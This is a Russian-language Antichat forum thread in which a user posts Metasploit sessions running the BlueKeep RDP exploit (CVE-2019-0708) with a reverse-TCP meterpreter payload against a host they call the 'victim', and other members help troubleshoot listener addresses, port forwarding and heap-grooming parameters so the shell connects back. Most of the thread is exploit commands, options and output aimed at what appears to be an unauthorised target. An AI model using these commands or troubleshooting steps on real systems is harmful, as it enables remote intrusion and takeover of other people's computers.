Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Вопрос по метасплоит (CVE-2019-0708) (https://forum.antichat.xyz/showthread.php?t=476298)

leikoz 21.03.2020 00:18

Проблемма с использованиемCVE-2019-0708

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

PAYLOAD => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Exploiting target 200.000.100.28
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"]
[*] 200.000.100.28:3389 - Surfing channels ...
[*] 200.000.100.28:3389 - Lobbing eggs ...

[-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for #

Может кто сталкивался, все перекопал не нашел похожей траблы.

3TON 21.03.2020 06:53

Покажи вывод "options"

leikoz 21.03.2020 14:28

[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35

fandor9 21.03.2020 14:36

[QUOTE="leikoz"]
leikoz said:

Проблемма с использованием
CVE-2019-0708[*] Sending stage (206403 bytes) to
5.164.26.35
[COLOR="#ff0000"][SIZE="4"]

leikoz 21.03.2020 20:53

Цитата:

Сообщение от fandor9
fandor9 said:

Вы порт 4444 пробрасываете на своём роутере? или как вы подключены к интернету? Я так понимаю RDP_CLIENT_IP должен быть вашим внешним адресом.

да порт проброшен, этот адресс "5.164.26.3" вообще не понятно откуда берется это не мой адресс и близко, бывают и другие, дело в том что там должен стоять ип жертвы тоесть "[*] Sending stage (206403 bytes) to 200.000.100.28" должно быть

видео правильной работы

hibar1Xs 22.03.2020 03:37

Цитата:

Сообщение от leikoz
leikoz said:

[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35

LHOST Ваш внешний адрес.

LPORT Внешний порт.

Потом укажите локальный порт и адрес через ReverseListenerBindAddress и ReverseListenerBindPort.

Подробнее посмотреть: show advanced

leikoz 22.03.2020 07:01

Цитата:

Сообщение от hibar1Xs
hibar1Xs said:

LHOST
Ваш внешний адрес.
LPORT
Внешний порт.
Потом укажите локальный порт и адрес через
ReverseListenerBindAddress
и
ReverseListenerBindPort
.
Подробнее посмотреть:
show advanced

не помогло.. все тоже самое происходит, буду пробовать с другой машины

fandor9 22.03.2020 13:40

Цитата:

Сообщение от leikoz
leikoz said:

не помогло.. все тоже самое происходит, буду пробовать с другой машины

может быть у вас не подходят адреса памяти (GROOMBASE) и размер памяти (GROOMSIZE), за счёт чего сплоит читает левый адрес памяти, где стоит всё что угодно, и берёт его как адрес. Тогда естественно сплоит летит мимо и падает. Тоесть вам надо подобрать правильный адрес и размер.


Время: 20:56